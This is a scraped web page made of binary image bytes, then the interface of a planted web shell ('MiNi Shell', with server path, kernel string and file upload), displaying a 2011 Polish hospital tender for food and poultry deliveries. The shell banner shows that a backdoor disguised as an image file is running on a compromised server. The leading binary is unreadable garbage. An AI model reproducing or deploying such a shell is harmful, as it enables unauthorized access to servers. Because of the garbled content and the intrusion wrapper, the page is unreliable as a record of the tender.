JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110516/115410-N-2011.html

<p class="kh_header"><b>Olsztynek: Sukcesywne dostawy art. spożywczych, mrożonek owocowo - warzywnych i rybnych oraz mięsa drobiowego</b><br>
<b>Numer ogłoszenia: 115410 - 2011; data zamieszczenia: 16.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Rehabilitacyjny dla Dzieci w Ameryce , 11-015 Olsztynek, woj. warmińsko-mazurskie, tel. 089 5194867, 5194810, faks 089 5194813.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ameryka.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy art. spożywczych, mrożonek owocowo - warzywnych i rybnych oraz mięsa drobiowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet nr. I
1	Budyń smak wiśniowy brzoskwiniowy opakowanie 1kg	szt	150
2	Chrzan tarty 290g 	szt.	130
3	Ciastka  deserowe luzem  mix	kg.	500
4	Cukier biały kryształ op.1kg.	kg.	2 800
5	Cukier waniliowy 16g	szt	1 400
6	Dżemy niskosłodzone/czarna porzeczka 290g 	szt.	250
7	Dżem niskosłodzony aronia z jabł. 290g	szt	150
8	Dżem niskosłodzony aronia z jabł. 280g	szt.	100
9	Dżem niskosłodzony wiśnia 260g	szt	100
10	Dżem niskosłodzony czerwona porzeczka opa.6,5kg	kg	100
11	Dżem niskosłodzony aronia opa.6,5kg	kg	100
12	Dżem niskosłodzony wiśnia opa.6,5kg	kg	100
13	Fasola biała sucha	kg.	90
14	Galaretki owocowe smak wiśniowy brzoskwiniowy opakowanie 1kg	szt. 	150
15	Groch suchy połówki 	kg.	70
16	Herbata czarna expressowa w saszetkach pakowana w kartoniku po 100 szt.  pojedyncza torebka 1,4 g  	op	40
17	Hrerbatniki 100 g.pakowane po 10 szt 	szt	4 000
18	Kakao 100g niskotłuszczowe 	szt.	50
19	Kakao 200g niskotłuszczowe 	szt.	25
20	Kasza gryczana prażona drobna op.0,5 kg	kg.	200
21	Kasza jęczmienna średnia, paczkowana  5kg	kg.	80
22	Kasza manna 1 kg	kg	5
23	Kawa zbożowa 1kg	kg.	20
24	Kiśle smak wiśniowy brzoskwiniowy, op.1kg	szt.	130
25	Koncentrat pomidorowy tylko z pomidorów 190g 30% bez konserwantów	szt	210
26	Koncentrat pomidorowy tylko z pomidorów 970g  30% bez konserwantów	szt	100
27	Kwasek cytrynowy 25g	szt.	150
28	Ketchup 970 / bez konserwantów i niezdrowych wzmacniaczy smaku min .184g pomidorów na 100g Ketchupu)	szt.	100
29	Ketchup  200g bez konserwantów i niezdrowych wzmacniaczy smaku min .184g pomidorów na 100g Ketchupu	kg	100
30	Liść laurowy 10g	kg 	5
31	Majonez  815g	szt.	100
32	Majonez 280g	szt.	150
	Makarony  czterojajeczne		
33	świderki drobne op.500g	kg.	90
34	wstążka op. 400g	kg.	90
35	łazanki op.500g	kg.	90
36	nitka rosołowa op.500g	kg.	90
37	spagetti 500g	kg.	90
38	drobny	kg	100
39	Mąka pszenna typ.450	kg.	1 200
40	Mąka ziemniaczana	kg.	30
41	Miód pszczeli 400g naturalny	szt	150
42	Majeranek 	kg	5
43	Musztarda 200g	szt	130
44	Ocet spożywczy spirytusowy 10% -0,5L	L	250
45	Oregano 	kg	2
46	Olej rzepakowy opakowanie 3L	L	500
47	Olej rzepakowy opakowanie  1L	L	50
48	Olej rzepakowy  opakowanie 0,5l	L	100
49	Olej słonecznikowy	L	200
50	Pieprz naturalny mielony 50g	kg.	20
51	Kuleczki zbożowe smak czekoladowy ChocoChrups zawartość błonnika nie mniejsza niż  5,0 g w 100 g produktu	kg	300
52	Kółeczka  Honey Chrups 	kg	200
53	Płatki kuk.miodowo orzechowe zawartość błonnika nie mniejsza niż  3,0 g w 100 g produktu	kg	200
54	Płatki kuk.Corn Fles z 5,0 g w 100 g produktuu	kg	160
55	Płatki musli z owocami op.500g	kg	160
56	Płatki owsiane górskie op.500g	kg	10
57	Płatki zwykłe kukurydziane	kg	50
58	Pieczywo chrupkie typu Wasa żytnie 210g opakowanie około 24 kromek	op	100
59	Proszek do pieczenia  18g	szt.	200
60	Rodzynki op.1kg	kg.	100
61	Ryż luzem biały	kg.	220
62	Sól jodowa paczkowana 	kg.	700
63	Sok 330ml  smaki: marchew-banan-jabłko lub marchew-jabłko	szt	5 100
64	Syrop pitny wysokosłodzony  420ml głóg, aronia czarna porzeczka 	szt.	300
65	Suchary bezcukrowe 285g	szt.	50
66	Sok pomidorowy	l	50
67	Soda spożywcza 100g	szt.	500
68	Ziarno kukurydzy (popcorn)	kg.	170
69	Zioła prawensalskie 	kg	2
70	Zioła Estragon	kg	3
71	Zioła Bazylia	kg	3
Pakiet nr.II
1	Fasolka szparagowa mroż.	kg.	120
2	Groszek zielony mrożony	kg.	120
3	Kalafior mrożony	kg.	200
4	Kukurydza mrożona	kg.	100
5	Mieszanka komp.4 składniki	kg.	1350
6	Papryka mrożona cięta	kg.	100
7	Filet mrożony/mintaj bez glazury	kg.	100
8	Filet mrożony morszczuk bez glazury	kg.	100
9	Filet mrożony dorsz bez glazury	kg.	100
10	Ryba wędzona/makrela	kg.	70
11	Wiśnia bez pestek mroż.	kg.	70
Pakiet nr.III
1	Ćwiartka tylna z kurczaka	kg.	800
2	Piersi drobiowe (filet)	kg.	450
3	Porcje  rosołowe	kg.	600
4	Piersi indycze	kg.	300
5	Serca drobiowe	kg.	70
6	żołądki	kg.	70
7	wątroba	kg.	50.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.11.00.00-2, 15.22.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku. Zamawiający dokona oceny spełnienia powyższego warunku na podstawie: złożenia oświadczenia o spełnieniu warunku udziału w postępowaniu, o którym mowa w art. 22 ust.1 pkt. 1 PZP,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	oświadczenie o spełnieniu warunków udziału w postępowaniu art.22 Pzp.
b)	oświadczenie, że zakład ma wdrożony system HACCP lub GMP  i GHP;
c)	formularz ofertowy;
d)	formularz cenowy;
e)	ważną decyzję o dopuszczeniu samochodu do przewozu żywności HDI (Dz. U z 2003r. Nr21 poz.179), którym będzie świadczona usługa</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana cen jednostkowych będzie dopuszczalna w przypadku  zmiany stawek podatkowych dla przedmiotu zamówienia i wówczas zmianie ulegać będzie tylko cena brutto. Zmiana ceny w  tym przypadku będzie następowała z chwilą wejścia w życie nowych przepisów bez konieczności podpisywania aneksów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ameryka.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiającego budynek administracji szpitala nr.26 lok.02.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2011 godzina 12:00, miejsce: budynek zadministracji szpitala lok.02 - Dzial zaopatrzenia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> art.spozywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Budyń smak wiśniowy brzoskwiniowy opakowanie 1kg	szt	150
2	Chrzan tarty 290g 	szt.	130
3	Ciastka  deserowe luzem  mix	kg.	500
4	Cukier biały kryształ op.1kg.	kg.	2 800
5	Cukier waniliowy 16g	szt	1 400
6	Dżemy niskosłodzone/czarna porzeczka 290g 	szt.	250
7	Dżem niskosłodzony aronia z jabł. 290g	szt	150
8	Dżem niskosłodzony aronia z jabł. 280g	szt.	100
9	Dżem niskosłodzony wiśnia 260g	szt	100
10	Dżem niskosłodzony czerwona porzeczka opa.6,5kg	kg	100
11	Dżem niskosłodzony aronia opa.6,5kg	kg	100
12	Dżem niskosłodzony wiśnia opa.6,5kg	kg	100
13	Fasola biała sucha	kg.	90
14	Galaretki owocowe smak wiśniowy brzoskwiniowy opakowanie 1kg	szt. 	150
15	Groch suchy połówki 	kg.	70
16	Herbata czarna expressowa w saszetkach pakowana w kartoniku po 100 szt.  pojedyncza torebka 1,4 g  	op	40
17	Hrerbatniki 100 g.pakowane po 10 szt 	szt	4 000
18	Kakao 100g niskotłuszczowe 	szt.	50
19	Kakao 200g niskotłuszczowe 	szt.	25
20	Kasza gryczana prażona drobna op.0,5 kg	kg.	200
21	Kasza jęczmienna średnia, paczkowana  5kg	kg.	80
22	Kasza manna 1 kg	kg	5
23	Kawa zbożowa 1kg	kg.	20
24	Kiśle smak wiśniowy brzoskwiniowy, op.1kg	szt.	130
25	Koncentrat pomidorowy tylko z pomidorów 190g 30% bez konserwantów	szt	210
26	Koncentrat pomidorowy tylko z pomidorów 970g  30% bez konserwantów	szt	100
27	Kwasek cytrynowy 25g	szt.	150
28	Ketchup 970 / bez konserwantów i niezdrowych wzmacniaczy smaku min .184g pomidorów na 100g Ketchupu)	szt.	100
29	Ketchup  200g bez konserwantów i niezdrowych wzmacniaczy smaku min .184g pomidorów na 100g Ketchupu	kg	100
30	Liść laurowy 10g	kg 	5
31	Majonez  815g	szt.	100
32	Majonez 280g	szt.	150
	Makarony  czterojajeczne		
33	świderki drobne op.500g	kg.	90
34	wstążka op. 400g	kg.	90
35	łazanki op.500g	kg.	90
36	nitka rosołowa op.500g	kg.	90
37	spagetti 500g	kg.	90
38	drobny	kg	100
39	Mąka pszenna typ.450	kg.	1 200
40	Mąka ziemniaczana	kg.	30
41	Miód pszczeli 400g naturalny	szt	150
42	Majeranek 	kg	5
43	Musztarda 200g	szt	130
44	Ocet spożywczy spirytusowy 10% -0,5L	L	250
45	Oregano 	kg	2
46	Olej rzepakowy opakowanie 3L	L	500
47	Olej rzepakowy opakowanie  1L	L	50
48	Olej rzepakowy  opakowanie 0,5l	L	100
49	Olej słonecznikowy	L	200
50	Pieprz naturalny mielony 50g	kg.	20
51	Kuleczki zbożowe smak czekoladowy ChocoChrups zawartość błonnika nie mniejsza niż  5,0 g w 100 g produktu	kg	300
52	Kółeczka  Honey Chrups 	kg	200
53	Płatki kuk.miodowo orzechowe zawartość błonnika nie mniejsza niż  3,0 g w 100 g produktu	kg	200
54	Płatki kuk.Corn Fles z 5,0 g w 100 g produktuu	kg	160
55	Płatki musli z owocami op.500g	kg	160
56	Płatki owsiane górskie op.500g	kg	10
57	Płatki zwykłe kukurydziane	kg	50
58	Pieczywo chrupkie typu Wasa żytnie 210g opakowanie około 24 kromek	op	100
59	Proszek do pieczenia  18g	szt.	200
60	Rodzynki op.1kg	kg.	100
61	Ryż luzem biały	kg.	220
62	Sól jodowa paczkowana 	kg.	700
63	Sok 330ml  smaki: marchew-banan-jabłko lub marchew-jabłko	szt	5 100
64	Syrop pitny wysokosłodzony  420ml głóg, aronia czarna porzeczka 	szt.	300
65	Suchary bezcukrowe 285g	szt.	50
66	Sok pomidorowy	l	50
67	Soda spożywcza 100g	szt.	500
68	Ziarno kukurydzy (popcorn)	kg.	170
69	Zioła prawensalskie 	kg	2
70	Zioła Estragon	kg	3
71	Zioła Bazylia	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mrożonki owocowo - warzywne oraz rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Fasolka szparagowa mroż.	kg.	120
2	Groszek zielony mrożony	kg.	120
3	Kalafior mrożony	kg.	200
4	Kukurydza mrożona	kg.	100
5	Mieszanka komp.4 składniki	kg.	1350
6	Papryka mrożona cięta	kg.	100
7	Filet mrożony/mintaj bez glazury	kg.	100
8	Filet mrożony morszczuk bez glazury	kg.	100
9	Filet mrożony dorsz bez glazury	kg.	100
10	Ryba wędzona/makrela	kg.	70
11	Wiśnia bez pestek mroż.	kg.	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.11.00.00-2, 15.22.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> mięso drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ćwiartka tylna z kurczaka	kg.	800
2	Piersi drobiowe (filet)	kg.	450
3	Porcje  rosołowe	kg.	600
4	Piersi indycze	kg.	300
5	Serca drobiowe	kg.	70
6	żołądki	kg.	70
7	wątroba	kg.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.11.00.00-2, 15.22.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com